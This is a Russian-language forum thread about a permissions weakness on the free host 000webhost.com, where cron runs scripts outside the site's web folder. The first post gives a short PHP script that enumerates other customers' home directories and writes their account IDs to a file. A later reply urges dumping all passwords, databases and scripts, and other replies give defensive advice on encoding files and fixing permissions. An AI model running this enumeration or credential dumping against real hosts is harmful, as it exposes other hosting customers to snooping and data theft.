Осторожно уязвимость с кроном.

Очень интиресная вещь тестировалась 000webhost.com
-путь к сайту /home/ИД/public_html
-путь к фтп /home/ИД/
-доступ в глубь для скрипта закрыт после
/home/id/public_html/
крон выполняет скрипты в /home/ИД/
тоисть создал файл /home/ИД/id.txt с_мод 666
и выполнял код

<?
for($i=0; $i<=1000000; ++$i)
{if(is_dir('/home/a'.$i.'/')) $t.='a'.$i."\n";}
$fp=fopen('./id.txt','w');
fputs($fp,$t);
fclose($fp);

Таким образом получаем список идов
вощем так. Смотрел фалы разных сайтов то все зазендино
Попрбую на h2m.ru но думаю там продумано.
Кто сидит на етом хосте советую зендить файлы где доступ к базе и проче и Ч_мод обизательно

Отпиши им. Может перепадёт чё-нить

Ага перепадет. у них до етого была уязвимость воще в cPanel залазил. Сказал им, они уязвимость закрыли а не то чтобы наградить а воще даже й спассибо не сказали.

Стыдно им когда находят ошибки)

а что вы от фрихостинга хотели?

Уязвимость не в кроне... а в руках.. из-за неправильной настройки httpd, неправильно выставлены чмоды. Вот из-за чмодов такая беда.

1, слей все пароли, все бд.
ну и все скрипты ))

7,а смысл?